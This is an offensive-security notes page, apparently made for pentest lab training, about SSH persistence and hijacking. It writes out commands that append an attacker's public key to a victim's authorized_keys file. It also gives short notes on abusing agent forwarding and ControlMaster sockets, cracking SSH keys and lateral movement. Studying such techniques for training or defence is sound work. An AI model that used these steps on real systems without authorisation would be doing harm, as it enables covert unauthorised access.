SSH

SSH Persistence and Hijacking

Peristence

if writable on victim

~/.ssh/authorized_keys

Create keys on attacker box

ssh-keygen

Copy id_rsa.pub key to victim

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/kali/.ssh/authorized_keys
ssh-copy-id "user@hostname.example.com -p <port-number>"
cat ~/.ssh/id_rsa.pub | ssh <user>@<hostname> 'cat >> .ssh/authorized_keys

Now you can SSH without a passphrase

ssh kali@linuxvictim

SSH Agent-Forwarding

Looking for socket files

  • Use existing connection to get to another machine

  • modification of ~/.ssh/config

  • any new connections will try to use an existing control socket

  • need to set permissions on the config file and create the controlmaster folder

  • Create keys

  • public keys need to be copied to the other boxes if possible

  • Must modify local .ssh/config file to enable forward agent

  • The intermediate server / controller must have AllowAgentForwarding in sshd config enabled

  • must enable the ssh agent on our Kali box

  • now we must add our keys to the ssh agent

  • ssh into the controller as offsec, then ssh into the linuxvictim as offsec and exit the linux victim session

Controlmaster config

  • need to set permissions on the config file and create the controlmaster folder

  • if there happens to be a session it can be seen in the controlmaster folder created

  • If there is an entry you can ssh to that box by specifying ssh -S

Enumeration of sockets

  • Looking for the "SSH_AUTH_SOCK entry"

Look for the last line "SSH_AUTH_SOCK"

Cracking SSH Keys

Copy SSH key to Kali

gunzip /usr/share/wordlists/rockyou.gz (if not already done)

Use cracked key to laterally move

PreviousImpacketNextKerberos Cache File

Last updated

Was this helpful?